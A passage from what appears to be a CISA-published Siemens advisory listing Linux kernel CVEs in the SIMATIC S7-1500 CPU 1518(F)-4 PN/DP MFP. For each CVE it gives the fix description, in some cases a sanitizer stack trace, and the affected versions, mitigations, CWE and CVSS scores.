<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-21707</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: mptcp: consolidate suboption status MPTCP maintains the received sub-options status is the bitmask carrying the received suboptions and in several bitfields carrying per suboption additional info. Zeroing the bitmask before parsing is not enough to ensure a consistent status, and the MPTCP code has to additionally clear some bitfiled depending on the actually parsed suboption. The above schema is fragile, and syzbot managed to trigger a path where a relevant bitfield is not cleared/initialized: BUG: KMSAN: uninit-value in __mptcp_expand_seq net/mptcp/options.c:1030 [inline] BUG: KMSAN: uninit-value in mptcp_expand_seq net/mptcp/protocol.h:864 [inline] BUG: KMSAN: uninit-value in ack_update_msk net/mptcp/options.c:1060 [inline] BUG: KMSAN: uninit-value in mptcp_incoming_options+0x2036/0x3d30 net/mptcp/options.c:1209 __mptcp_expand_seq net/mptcp/options.c:1030 [inline] mptcp_expand_seq net/mptcp/protocol.h:864 [inline] ack_update_msk net/mptcp/options.c:1060 [inline] mptcp_incoming_options+0x2036/0x3d30 net/mptcp/options.c:1209 tcp_data_queue+0xb4/0x7be0 net/ipv4/tcp_input.c:5233 tcp_rcv_established+0x1061/0x2510 net/ipv4/tcp_input.c:6264 tcp_v4_do_rcv+0x7f3/0x11a0 net/ipv4/tcp_ipv4.c:1916 tcp_v4_rcv+0x51df/0x5750 net/ipv4/tcp_ipv4.c:2351 ip_protocol_deliver_rcu+0x2a3/0x13d0 net/ipv4/ip_input.c:205 ip_local_deliver_finish+0x336/0x500 net/ipv4/ip_input.c:233 NF_HOOK include/linux/netfilter.h:314 [inline] ip_local_deliver+0x21f/0x490 net/ipv4/ip_input.c:254 dst_input include/net/dst.h:460 [inline] ip_rcv_finish+0x4a2/0x520 net/ipv4/ip_input.c:447 NF_HOOK include/linux/netfilter.h:314 [inline] ip_rcv+0xcd/0x380 net/ipv4/ip_input.c:567 __netif_receive_skb_one_core net/core/dev.c:5704 [inline] __netif_receive_skb+0x319/0xa00 net/core/dev.c:5817 process_backlog+0x4ad/0xa50 net/core/dev.c:6149 __napi_poll+0xe7/0x980 net/core/dev.c:6902 napi_poll net/core/dev.c:6971 [inline] net_rx_action+0xa5a/0x19b0 net/core/dev.c:7093 handle_softirqs+0x1a0/0x7c0 kernel/softirq.c:561 __do_softirq+0x14/0x1a kernel/softirq.c:595 do_softirq+0x9a/0x100 kernel/softirq.c:462 __local_bh_enable_ip+0x9f/0xb0 kernel/softirq.c:389 local_bh_enable include/linux/bottom_half.h:33 [inline] rcu_read_unlock_bh include/linux/rcupdate.h:919 [inline] __dev_queue_xmit+0x2758/0x57d0 net/core/dev.c:4493 dev_queue_xmit include/linux/netdevice.h:3168 [inline] neigh_hh_output include/net/neighbour.h:523 [inline] neigh_output include/net/neighbour.h:537 [inline] ip_finish_output2+0x187c/0x1b70 net/ipv4/ip_output.c:236 __ip_finish_output+0x287/0x810 ip_finish_output+0x4b/0x600 net/ipv4/ip_output.c:324 NF_HOOK_COND include/linux/netfilter.h:303 [inline] ip_output+0x15f/0x3f0 net/ipv4/ip_output.c:434 dst_output include/net/dst.h:450 [inline] ip_local_out net/ipv4/ip_output.c:130 [inline] __ip_queue_xmit+0x1f2a/0x20d0 net/ipv4/ip_output.c:536 ip_queue_xmit+0x60/0x80 net/ipv4/ip_output.c:550 __tcp_transmit_skb+0x3cea/0x4900 net/ipv4/tcp_output.c:1468 tcp_transmit_skb net/ipv4/tcp_output.c:1486 [inline] tcp_write_xmit+0x3b90/0x9070 net/ipv4/tcp_output.c:2829 __tcp_push_pending_frames+0xc4/0x380 net/ipv4/tcp_output.c:3012 tcp_send_fin+0x9f6/0xf50 net/ipv4/tcp_output.c:3618 __tcp_close+0x140c/0x1550 net/ipv4/tcp.c:3130 __mptcp_close_ssk+0x74e/0x16f0 net/mptcp/protocol.c:2496 mptcp_close_ssk+0x26b/0x2c0 net/mptcp/protocol.c:2550 mptcp_pm_nl_rm_addr_or_subflow+0x635/0xd10 net/mptcp/pm_netlink.c:889 mptcp_pm_nl_rm_subflow_received net/mptcp/pm_netlink.c:924 [inline] mptcp_pm_flush_addrs_and_subflows net/mptcp/pm_netlink.c:1688 [inline] mptcp_nl_flush_addrs_list net/mptcp/pm_netlink.c:1709 [inline] mptcp_pm_nl_flush_addrs_doit+0xe10/0x1630 net/mptcp/pm_netlink.c:1750 genl_family_rcv_msg_doit net/netlink/genetlink.c:1115 [inline] ---truncated---</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-21707">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/908.html">CWE-908 Use of Uninitialized Resource</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-21718</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net: rose: fix timer races against user threads Rose timers only acquire the socket spinlock, without checking if the socket is owned by one user thread. Add a check and rearm the timers if needed. BUG: KASAN: slab-use-after-free in rose_timer_expiry+0x31d/0x360 net/rose/rose_timer.c:174 Read of size 2 at addr ffff88802f09b82a by task swapper/0/0 CPU: 0 UID: 0 PID: 0 Comm: swapper/0 Not tainted 6.13.0-rc5-syzkaller-00172-gd1bf27c4e176 #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 09/13/2024 Call Trace: __dump_stack lib/dump_stack.c:94 [inline] dump_stack_lvl+0x241/0x360 lib/dump_stack.c:120 print_address_description mm/kasan/report.c:378 [inline] print_report+0x169/0x550 mm/kasan/report.c:489 kasan_report+0x143/0x180 mm/kasan/report.c:602 rose_timer_expiry+0x31d/0x360 net/rose/rose_timer.c:174 call_timer_fn+0x187/0x650 kernel/time/timer.c:1793 expire_timers kernel/time/timer.c:1844 [inline] __run_timers kernel/time/timer.c:2418 [inline] __run_timer_base+0x66a/0x8e0 kernel/time/timer.c:2430 run_timer_base kernel/time/timer.c:2439 [inline] run_timer_softirq+0xb7/0x170 kernel/time/timer.c:2449 handle_softirqs+0x2d4/0x9b0 kernel/softirq.c:561 __do_softirq kernel/softirq.c:595 [inline] invoke_softirq kernel/softirq.c:435 [inline] __irq_exit_rcu+0xf7/0x220 kernel/softirq.c:662 irq_exit_rcu+0x9/0x30 kernel/softirq.c:678 instr_sysvec_apic_timer_interrupt arch/x86/kernel/apic/apic.c:1049 [inline] sysvec_apic_timer_interrupt+0xa6/0xc0 arch/x86/kernel/apic/apic.c:1049</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-21718">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/416.html">CWE-416 Use After Free</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-21731</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: nbd: don't allow reconnect after disconnect Following process can cause nbd_config UAF: 1) grab nbd_config temporarily; 2) nbd_genl_disconnect() flush all recv_work() and release the initial reference: nbd_genl_disconnect nbd_disconnect_and_put nbd_disconnect flush_workqueue(nbd-&gt;recv_workq) if (test_and_clear_bit(NBD_RT_HAS_CONFIG_REF, ...)) nbd_config_put -&gt; due to step 1), reference is still not zero 3) nbd_genl_reconfigure() queue recv_work() again; nbd_genl_reconfigure config = nbd_get_config_unlocked(nbd) if (!config) -&gt; succeed if (!test_bit(NBD_RT_BOUND, ...)) -&gt; succeed nbd_reconnect_socket queue_work(nbd-&gt;recv_workq, &amp;args-&gt;work) 4) step 1) release the reference; 5) Finially, recv_work() will trigger UAF: recv_work nbd_config_put(nbd) -&gt; nbd_config is freed atomic_dec(&amp;config-&gt;recv_threads) -&gt; UAF Fix the problem by clearing NBD_RT_BOUND in nbd_genl_disconnect(), so that nbd_genl_reconfigure() will fail.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-21731">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/416.html">CWE-416 Use After Free</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-21745</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: blk-cgroup: Fix class @block_class's subsystem refcount leakage blkcg_fill_root_iostats() iterates over @block_class's devices by class_dev_iter_(init|next)(), but does not end iterating with class_dev_iter_exit(), so causes the class's subsystem refcount leakage. Fix by ending the iterating with class_dev_iter_exit().</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-21745">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/401.html">CWE-401 Missing Release of Memory after Effective Lifetime</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-21758</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: ipv6: mcast: add RCU protection to mld_newpack() mld_newpack() can be called without RTNL or RCU being held. Note that we no longer can use sock_alloc_send_skb() because ipv6.igmp_sk uses GFP_KERNEL allocations which can sleep. Instead use alloc_skb() and charge the net-&gt;ipv6.igmp_sk socket under RCU protection.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-21758">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-21760</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: ndisc: extend RCU protection in ndisc_send_skb() ndisc_send_skb() can be called without RTNL or RCU held. Acquire rcu_read_lock() earlier, so that we can use dev_net_rcu() and avoid a potential UAF.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-21760">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/416.html">CWE-416 Use After Free</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-21764</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: ndisc: use RCU protection in ndisc_alloc_skb() ndisc_alloc_skb() can be called without RTNL or RCU being held. Add RCU protection to avoid possible UAF.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-21764">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/416.html">CWE-416 Use After Free</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-21765</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: ipv6: use RCU protection in ip6_default_advmss() ip6_default_advmss() needs rcu protection to make sure the net structure it reads does not disappear.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-21765">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-21780</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu: avoid buffer overflow attach in smu_sys_set_pp_table() It malicious user provides a small pptable through sysfs and then a bigger pptable, it may cause buffer overflow attack in function smu_sys_set_pp_table().</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-21780">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
